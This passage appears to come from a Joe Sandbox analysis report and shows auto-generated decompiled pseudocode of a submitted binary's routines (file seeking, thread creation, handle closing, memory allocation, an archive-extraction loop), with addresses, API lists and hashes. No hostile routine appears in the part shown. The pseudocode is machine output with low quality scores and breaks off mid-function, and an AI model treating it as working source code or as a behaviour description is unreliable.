				_push(__ecx);
				_t9 = _a8;
				_v8 = _t9;
				_t21 = _t9 >> 0x1f;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					_t12 = E004190A0(_v8, 0, 0, 1);
					asm("adc edx, eax");
					_t14 = _a16;
					 *_t14 = _t12 + _t23;
					 *(_t14 + 4) = _t21;
					_t15 = 1;
				} else {
					_t15 = 0;
				}
				return _t15;
			}











                                                                                                                            0x00405306
                                                                                                                            0x00405307
                                                                                                                            0x00405310
                                                                                                                            0x0040531a
                                                                                                                            0x0040531f
                                                                                                                            0x00405325
                                                                                                                            0x0040532a
                                                                                                                            0x00405343
                                                                                                                            0x0040534e
                                                                                                                            0x00405350
                                                                                                                            0x00405353
                                                                                                                            0x00405355
                                                                                                                            0x00405358
                                                                                                                            0x00405336
                                                                                                                            0x00405336
                                                                                                                            0x00405336
                                                                                                                            0x0040535c

                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040531F
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040532C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2976181284-0
                                                                                                                            • Opcode ID: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                                                                                                            • Instruction ID: 9124dc6d7053f8d6efb0d5dd32d4d25d1ca9512a9ee8f9f64a9de147337f6b78
                                                                                                                            • Opcode Fuzzy Hash: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                                                                                                            • Instruction Fuzzy Hash: 11F04971600208ABCB11DF69DC05BDB3BE5EB49354F108165F915E72A0E6759D10AAA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410B21 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E00410B21(void* __ecx) {
				void* _t15;
				intOrPtr _t25;
				void* _t30;
				intOrPtr _t32;

				E00418D80(E0041A5F8, _t30);
				_push(__ecx);
				_push(__ecx);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t30 + 8));
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_push(_t25); // executed
				_t15 = E00410864(__ecx); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t25 + 0x14a)) = 1;
				}
				if(_t15 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
					return _t15;
				} else {
					_push(0x41de18);
					 *((char*)(_t30 - 0x11)) =  *((intOrPtr*)(_t30 + 0xb));
					_push(_t30 - 0x11);
					L00418E02();
					 *((char*)( *((intOrPtr*)(_t30 + 8)) + 0x14e)) = 1;
					return E00410B8A;
				}
			}







                                                                                                                            0x00410b26
                                                                                                                            0x00410b2b
                                                                                                                            0x00410b2c
                                                                                                                            0x00410b2d
                                                                                                                            0x00410b34
                                                                                                                            0x00410b37
                                                                                                                            0x00410b3c
                                                                                                                            0x00410b3d
                                                                                                                            0x00410b46
                                                                                                                            0x00410b48
                                                                                                                            0x00410b48
                                                                                                                            0x00410b54
                                                                                                                            0x00410b92
                                                                                                                            0x00410b9b
                                                                                                                            0x00410b56
                                                                                                                            0x00410b59
                                                                                                                            0x00410b5e
                                                                                                                            0x00410b64
                                                                                                                            0x00410b65
                                                                                                                            0x00410b6d
                                                                                                                            0x00410b79
                                                                                                                            0x00410b79

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00410B26
                                                                                                                              • Part of subcall function 00410864: __EH_prolog.LIBCMT ref: 00410869
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ExceptionThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2366012087-0
                                                                                                                            • Opcode ID: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                                                                                                            • Instruction ID: 66cfeec8bba6f5a58313027dc29a8bde198ffc6f74079f781ea7209b80be1e28
                                                                                                                            • Opcode Fuzzy Hash: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                                                                                                            • Instruction Fuzzy Hash: 86F0FC71548344AEDB11DB98C4457EEBBA4EB55318F04405FF0449B241C7FCB9C487A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418A80 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E00418A80(intOrPtr* __ecx, void* __edx, char _a4) {
				char* _t3;
				long _t4;
				void* _t10;

				_t3 =  &_a4;
				__imp___beginthreadex(0, 0, __edx, _a4, 0, _t3, _t10); // executed
				 *__ecx = _t3;
				if(_t3 == 0) {
					_t4 = GetLastError();
					if(_t4 == 0) {
						return 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}






                                                                                                                            0x00418a81
                                                                                                                            0x00418a94
                                                                                                                            0x00418a9d
                                                                                                                            0x00418aa2
                                                                                                                            0x00418aa9
                                                                                                                            0x00418ab1
                                                                                                                            0x00000000
                                                                                                                            0x00418ab3
                                                                                                                            0x00418ab8
                                                                                                                            0x00418aa4
                                                                                                                            0x00418aa6
                                                                                                                            0x00418aa6

                                                                                                                            APIs
                                                                                                                            • _beginthreadex.MSVCRT ref: 00418A94
                                                                                                                            • GetLastError.KERNEL32(?,?,75C182C0,00000000,00000000), ref: 00418AA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast_beginthreadex
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4034172046-0
                                                                                                                            • Opcode ID: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                                                                                                            • Instruction ID: 70daae52a94726005310dc0db4673b1cb6198bfb299c528c22bbb718e3dc4f27
                                                                                                                            • Opcode Fuzzy Hash: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                                                                                                            • Instruction Fuzzy Hash: D2E0E6B12052026FE3109B64DC15FA77698EF94781F44847EB545D6280EB749850C7B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418A40 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00418A40(void** __ecx) {
				void* _t1;
				int _t3;
				long _t4;
				intOrPtr* _t7;

				_t7 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0) {
					L5:
					return 0;
				}
				_t3 = FindCloseChangeNotification(_t1); // executed
				if(_t3 != 0) {
					 *_t7 = 0;
					goto L5;
				}
				_t4 = GetLastError();
				if(_t4 != 0) {
					return _t4;
				} else {
					return 1;
				}
			}







                                                                                                                            0x00418a41
                                                                                                                            0x00418a43
                                                                                                                            0x00418a47
                                                                                                                            0x00418a6b
                                                                                                                            0x00000000
                                                                                                                            0x00418a6b
                                                                                                                            0x00418a4a
                                                                                                                            0x00418a52
                                                                                                                            0x00418a65
                                                                                                                            0x00000000
                                                                                                                            0x00418a65
                                                                                                                            0x00418a54
                                                                                                                            0x00418a5c
                                                                                                                            0x00418a6e
                                                                                                                            0x00418a5e
                                                                                                                            0x00418a64
                                                                                                                            0x00418a64

                                                                                                                            APIs
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C182C0,00000000,00000000), ref: 00418A4A
                                                                                                                            • GetLastError.KERNEL32(?,75C182C0,00000000,00000000), ref: 00418A54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1687624791-0
                                                                                                                            • Opcode ID: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                                                                                                            • Instruction ID: 7535ee298610e88dfaab19b27145df70c5ba92bd44e4c2e9d74370dd166c20af
                                                                                                                            • Opcode Fuzzy Hash: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                                                                                                            • Instruction Fuzzy Hash: EDD09E316141118FEB705F79BC087D726D8AF04791F15846FB450C2344EF68CDC146A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405FD6 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405FD6(DWORD* __ecx) {
				int _t4;

				_t4 = GetProcessAffinityMask(GetCurrentProcess(), __ecx,  &(__ecx[1])); // executed
				return _t4;
			}




                                                                                                                            0x00405fe2
                                                                                                                            0x00405fe8

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                                                                                                            • GetProcessAffinityMask.KERNEL32 ref: 00405FE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1231390398-0
                                                                                                                            • Opcode ID: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                                                                                                            • Instruction ID: 732ff7f231baee20a9cffd8d9fa0ed88e0eff740d633cb47fb09654a2f39704a
                                                                                                                            • Opcode Fuzzy Hash: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                                                                                                            • Instruction Fuzzy Hash: 80B092B1400104ABCE009BA0DE0C86B3E2CEA0C2013048468B215C1012DB3AC0018BA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004031DD Relevance: 2.5, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E004031DD(int _a4, char _a7) {
				void* _t5;
				char* _t7;

				_t5 = malloc(_a4); // executed
				if(_t5 == 0) {
					_push(0x41c8c8);
					_t7 =  &_a7;
					_push(_t7);
					L00418E02();
					return _t7;
				}
				return _t5;
			}





                                                                                                                            0x004031e3
                                                                                                                            0x004031ec
                                                                                                                            0x004031f1
                                                                                                                            0x004031f9
                                                                                                                            0x004031fc
                                                                                                                            0x004031fd
                                                                                                                            0x00000000
                                                                                                                            0x004031fd
                                                                                                                            0x00403203

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrowmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2436765578-0
                                                                                                                            • Opcode ID: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                                                                                                            • Instruction ID: 21ad3b6c62fa819954115c8b0a5ff63e7c490964cbfc0d860bfe7ccd9a4adc8e
                                                                                                                            • Opcode Fuzzy Hash: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                                                                                                            • Instruction Fuzzy Hash: D9D0A73114434C7ACF016FE19C059CA3F5C9901671B00D46BF8588E116D634D3844758
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D4B4 Relevance: 2.0, APIs: 1, Instructions: 536COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0040D4B4() {
				signed int _t311;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t340;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				intOrPtr _t358;
				signed int _t360;
				signed int _t361;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed int _t393;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t407;
				intOrPtr _t408;
				signed int _t410;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t428;
				intOrPtr _t453;
				signed int _t459;
				signed int _t472;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t488;
				signed int _t494;
				void* _t496;
				void* _t498;

				E00418D80(E0041A39B, _t496);
				_t483 =  *(_t496 + 0x18);
				_t400 = _t483;
				 *((intOrPtr*)(_t496 - 0x10)) = _t498 - 0x9c;
				 *(_t496 - 4) = 0;
				 *(_t496 - 0x1c) = _t400;
				if(_t483 != 0) {
					 *((intOrPtr*)( *_t483 + 4))(_t483);
				}
				 *((intOrPtr*)(_t496 - 0x34)) = 0;
				 *(_t496 - 0x30) = 0;
				_t494 =  *(_t496 + 8);
				 *(_t496 + 0x1b) =  *((intOrPtr*)(_t496 + 0x10)) == 0xffffffff;
				 *(_t496 - 4) = 1;
				if( *(_t496 + 0x1b) != 0) {
					 *((intOrPtr*)(_t496 + 0x10)) =  *((intOrPtr*)(_t494 + 0x8c));
				}
				if( *((intOrPtr*)(_t496 + 0x10)) != 0) {
					_t484 = _t483 | 0xffffffff;
					__eflags = _t484;
					 *(_t496 + 8) = 0;
					while(1) {
						__eflags =  *(_t496 + 8) -  *((intOrPtr*)(_t496 + 0x10));
						if( *(_t496 + 8) >=  *((intOrPtr*)(_t496 + 0x10))) {
							break;
						}
						__eflags =  *(_t496 + 0x1b);
						if( *(_t496 + 0x1b) == 0) {
							_t393 =  *( *((intOrPtr*)(_t496 + 0xc)) +  *(_t496 + 8) * 4);
						} else {
							_t393 =  *(_t496 + 8);
						}
						_t472 =  *( *((intOrPtr*)(_t494 + 0x164)) + _t393 * 4);
						__eflags = _t472 - 0xffffffff;
						if(_t472 == 0xffffffff) {
							L20:
							 *(_t496 + 8) =  *(_t496 + 8) + 1;
							continue;
						} else {
							__eflags = _t472 - _t484;
							if(_t472 != _t484) {
								L15:
								_t477 =  *( *((intOrPtr*)(_t494 + 0x160)) + _t472 * 4);
								L16:
								 *(_t496 - 0x20) = _t477;
								while(1) {
									__eflags =  *(_t496 - 0x20) - _t393;
									if( *(_t496 - 0x20) > _t393) {
										break;
									}
									_t400 =  *(_t496 - 0x1c);
									 *((intOrPtr*)(_t496 - 0x34)) =  *((intOrPtr*)(_t496 - 0x34)) +  *((intOrPtr*)(( *(_t496 - 0x20) << 4) +  *((intOrPtr*)(_t494 + 0x88))));
									asm("adc [ebp-0x30], edx");
									 *(_t496 - 0x20) =  *(_t496 - 0x20) + 1;
								}
								_t44 = _t393 + 1; // 0x1
								_t477 = _t44;
								_t484 = _t472;
								goto L20;
							}
							__eflags = _t393 - _t477;
							if(_t393 >= _t477) {
								goto L16;
							}
							goto L15;
						}
					}
					_t485 =  *((intOrPtr*)( *_t400 + 0xc))(_t400,  *((intOrPtr*)(_t496 - 0x34)),  *(_t496 - 0x30));
					__eflags = _t485;
					if(_t485 == 0) {
						_push(0x38);
						_t410 = E004031DD();
						 *(_t496 + 8) = _t410;
						__eflags = _t410;
						 *(_t496 - 4) = 2;
						if(_t410 == 0) {
							_t486 = 0;
							__eflags = 0;
						} else {
							_t486 = E0040765F(_t410);
						}
						__eflags = _t486;
						 *(_t496 - 0x30) = _t486;
						 *(_t496 - 4) = 1;
						 *(_t496 - 0x24) = _t486;
						if(_t486 != 0) {
							 *((intOrPtr*)( *_t486 + 4))(_t486);
						}
						 *(_t496 - 4) = 3;
						E004076F5(_t486, _t400);
						E0040BC60(_t496 - 0xa8, __eflags, 1);
						 *(_t496 - 0x14) =  *(_t496 - 0x14) & 0x00000000;
						 *(_t496 - 4) = 5;
						 *((intOrPtr*)( *_t400))(_t400, 0x41b230, _t496 - 0x14, 0);
						_push(0x38);
						_t415 = E004031DD();
						 *(_t496 + 8) = _t415;
						__eflags = _t415;
						 *(_t496 - 4) = 6;
						if(_t415 == 0) {
							_t401 = 0;
							__eflags = 0;
						} else {
							_t401 = E0040DB8E(_t415);
						}
						__eflags = _t401;
						 *(_t496 - 4) = 5;
						 *(_t496 - 0x2c) = _t401;
						 *(_t496 - 0x18) = _t401;
						if(_t401 != 0) {
							 *((intOrPtr*)( *_t401 + 4))(_t401);
						}
						_t73 = _t401 + 0x30; // 0x30
						_t416 = _t73;
						 *(_t496 - 4) = 7;
						 *((intOrPtr*)(_t401 + 0x2c)) = _t494 + 0x30;
						E004063E5(_t416,  *(_t496 - 0x1c));
						__eflags =  *(_t496 + 0x14);
						 *(_t496 - 0x20) = 0;
						_t417 = _t416 & 0xffffff00 |  *(_t496 + 0x14) != 0x00000000;
						 *(_t401 + 0xc) = _t417;
						__eflags =  *(_t494 + 0x180);
						_t83 =  *(_t494 + 0x180) != 0;
						__eflags = _t83;
						 *((char*)(_t401 + 0xd)) = _t417 & 0xffffff00 | _t83;
						while(1) {
							_t402 = E004077D1(_t486);
							__eflags = _t402;
							if(_t402 != 0) {
								break;
							}
							_t474 =  *(_t496 - 0x20);
							__eflags = _t474 -  *((intOrPtr*)(_t496 + 0x10));
							if(_t474 <  *((intOrPtr*)(_t496 + 0x10))) {
								__eflags =  *(_t496 + 0x1b);
								 *((intOrPtr*)(_t496 - 0x3c)) = 0;
								 *((intOrPtr*)(_t496 - 0x38)) = 0;
								 *((intOrPtr*)(_t496 - 0x48)) = 0;
								 *((intOrPtr*)(_t496 - 0x44)) = 0;
								if( *(_t496 + 0x1b) == 0) {
									_t474 =  *( *((intOrPtr*)(_t496 + 0xc)) + _t474 * 4);
								}
								 *(_t496 - 0x40) = 1;
								_t488 =  *( *((intOrPtr*)(_t494 + 0x164)) + _t474 * 4);
								__eflags = _t488 - 0xffffffff;
								 *(_t496 + 0x14) = _t488;
								if(_t488 == 0xffffffff) {
									L67:
									_t403 =  *(_t496 - 0x20);
									asm("sbb eax, eax");
									_t311 = E0040D16C( *(_t496 - 0x2c), _t474,  !( ~( *(_t496 + 0x1b))) &  *((intOrPtr*)(_t496 + 0xc)) + _t403 * 0x00000004,  *(_t496 - 0x40));
									 *(_t496 + 0x14) = _t311;
									__eflags = _t311;
									 *(_t496 - 0x20) = _t403 +  *(_t496 - 0x40);
									if(_t311 == 0) {
										__eflags =  *( *(_t496 - 0x2c) + 0x24);
										if(__eflags == 0) {
											L123:
											_t486 =  *(_t496 - 0x30);
											 *((intOrPtr*)(_t486 + 0x28)) =  *((intOrPtr*)(_t486 + 0x28)) +  *((intOrPtr*)(_t496 - 0x3c));
											asm("adc [edi+0x2c], ecx");
											 *((intOrPtr*)(_t486 + 0x20)) =  *((intOrPtr*)(_t486 + 0x20)) +  *((intOrPtr*)(_t496 - 0x48));
											asm("adc [edi+0x24], eax");
											continue;
										}
										_push( *((intOrPtr*)(_t494 + 0x1c)));
										 *(_t496 + 0xb) =  *(_t496 + 0xb) & 0x00000000;
										_push( *((intOrPtr*)(_t494 + 0x18)));
										 *(_t496 - 4) = 8;
										_push( *((intOrPtr*)(_t494 + 0x10)));
										_t405 = 1;
										_push(_t405);
										_push(_t496 + 0xb);
										_push(0);
										_push( *(_t496 - 0x24));
										_push( *(_t496 - 0x18));
										_push(_t496 - 0x3c);
										_push(_t488);
										_push(_t494 + 0x30);
										_push( *((intOrPtr*)(_t494 + 0x144)));
										_push( *((intOrPtr*)(_t494 + 0x140)));
										_push( *((intOrPtr*)(_t494 + 0x28))); // executed
										_t317 = E0040BD85(_t496 - 0xa8, __eflags); // executed
										__eflags = _t317 - _t405;
										 *(_t496 + 0x14) = _t317;
										if(_t317 == _t405) {
											L92:
											_t428 =  *(_t496 - 0x2c);
											 *(_t496 - 0x28) = 2;
											__eflags =  *(_t428 + 0x24);
											 *((char*)(_t496 + 0x17)) =  *(_t428 + 0x24) == 0;
											__eflags = _t317 - _t405;
											if(_t317 != _t405) {
												__eflags = _t317 - 0x80004001;
												if(_t317 != 0x80004001) {
													__eflags =  *((char*)(_t496 + 0x17));
													if( *((char*)(_t496 + 0x17)) != 0) {
														__eflags =  *(_t496 + 0xb);
														if( *(_t496 + 0xb) != 0) {
															 *(_t496 - 0x28) = 6;
														}
													}
												} else {
													 *(_t496 - 0x28) = _t405;
												}
											}
											_t402 = E0040D47F( *(_t496 - 0x2c), _t496,  *(_t496 - 0x28));
											__eflags = _t402;
											if(_t402 == 0) {
												__eflags =  *((char*)(_t496 + 0x17));
												if( *((char*)(_t496 + 0x17)) == 0) {
													L122:
													 *(_t496 - 4) = 7;
													goto L123;
												}
												_t319 =  *(_t496 - 0x14);
												__eflags = _t319;
												if(_t319 == 0) {
													goto L122;
												}
												_t320 =  *((intOrPtr*)( *_t319 + 0x14))(_t319, 2, _t488,  *(_t496 - 0x28));
												L112:
												_t485 = _t320;
												__eflags = _t485;
												if(_t485 == 0) {
													goto L122;
												}
												_t321 =  *(_t496 - 0x18);
												 *(_t496 - 4) = 5;
												__eflags = _t321;
												if(_t321 != 0) {
													 *((intOrPtr*)( *_t321 + 8))(_t321);
												}
												_t322 =  *(_t496 - 0x14);
												 *(_t496 - 4) = 4;
												__eflags = _t322;
												if(_t322 != 0) {
													 *((intOrPtr*)( *_t322 + 8))(_t322);
												}
												 *(_t496 - 4) = 3;
												E0040DC5D(_t496 - 0xa8);
												_t324 =  *(_t496 - 0x24);
												 *(_t496 - 4) = 1;
												__eflags = _t324;
												if(_t324 != 0) {
													 *((intOrPtr*)( *_t324 + 8))(_t324);
												}
												_t325 =  *(_t496 - 0x1c);
												 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
												__eflags = _t325;
												if(_t325 != 0) {
													 *((intOrPtr*)( *_t325 + 8))(_t325);
												}
												L121:
												_t326 = _t485;
											} else {
												_t331 =  *(_t496 - 0x18);
												 *(_t496 - 4) = 5;
												__eflags = _t331;
												if(_t331 != 0) {
													 *((intOrPtr*)( *_t331 + 8))(_t331);
												}
												_t332 =  *(_t496 - 0x14);
												 *(_t496 - 4) = 4;
												__eflags = _t332;
												if(_t332 != 0) {
													 *((intOrPtr*)( *_t332 + 8))(_t332);
												}
												 *(_t496 - 4) = 3;
												E0040DC5D(_t496 - 0xa8);
												_t334 =  *(_t496 - 0x24);
												 *(_t496 - 4) = 1;
												__eflags = _t334;
												if(_t334 != 0) {
													 *((intOrPtr*)( *_t334 + 8))(_t334);
												}
												_t335 =  *(_t496 - 0x1c);
												 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
												__eflags = _t335;
												L106:
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t335 + 8))(_t335);
												}
												_t326 = _t402;
											}
											goto L124;
										}
										__eflags = _t317 - 0x80004001;
										if(_t317 == 0x80004001) {
											goto L92;
										}
										__eflags =  *(_t496 + 0xb);
										if( *(_t496 + 0xb) != 0) {
											goto L92;
										}
										__eflags = _t317;
										if(_t317 == 0) {
											_t320 = E0040D47F( *(_t496 - 0x2c), _t496, 2);
											goto L112;
										}
										__eflags =  *(_t496 - 0x18);
										 *(_t496 - 4) = 5;
										if( *(_t496 - 0x18) != 0) {
											_t347 =  *(_t496 - 0x18);
											 *((intOrPtr*)( *_t347 + 8))(_t347);
										}
										_t340 =  *(_t496 - 0x14);
										 *(_t496 - 4) = 4;
										__eflags = _t340;
										if(_t340 != 0) {
											 *((intOrPtr*)( *_t340 + 8))(_t340);
										}
										 *(_t496 - 4) = 3;
										E0040DC5D(_t496 - 0xa8);
										_t342 =  *(_t496 - 0x24);
										 *(_t496 - 4) = 1;
										__eflags = _t342;
										if(_t342 != 0) {
											 *((intOrPtr*)( *_t342 + 8))(_t342);
										}
										_t343 =  *(_t496 - 0x1c);
										 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
										__eflags = _t343;
										if(_t343 != 0) {
											 *((intOrPtr*)( *_t343 + 8))(_t343);
										}
										_t326 =  *(_t496 + 0x14);
										goto L124;
									}
									_t349 =  *(_t496 - 0x18);
									 *(_t496 - 4) = 5;
									__eflags = _t349;
									if(_t349 != 0) {
										 *((intOrPtr*)( *_t349 + 8))(_t349);
									}
									_t350 =  *(_t496 - 0x14);
									 *(_t496 - 4) = 4;
									__eflags = _t350;
									if(_t350 != 0) {
										 *((intOrPtr*)( *_t350 + 8))(_t350);
									}
									 *(_t496 - 4) = 3;
									E0040DC5D(_t496 - 0xa8);
									_t352 =  *(_t496 - 0x24);
									 *(_t496 - 4) = 1;
									__eflags = _t352;
									if(_t352 != 0) {
										 *((intOrPtr*)( *_t352 + 8))(_t352);
									}
									_t353 =  *(_t496 - 0x1c);
									 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
									__eflags = _t353;
									if(_t353 != 0) {
										 *((intOrPtr*)( *_t353 + 8))(_t353);
									}
									_t326 =  *(_t496 + 0x14);
									goto L124;
								} else {
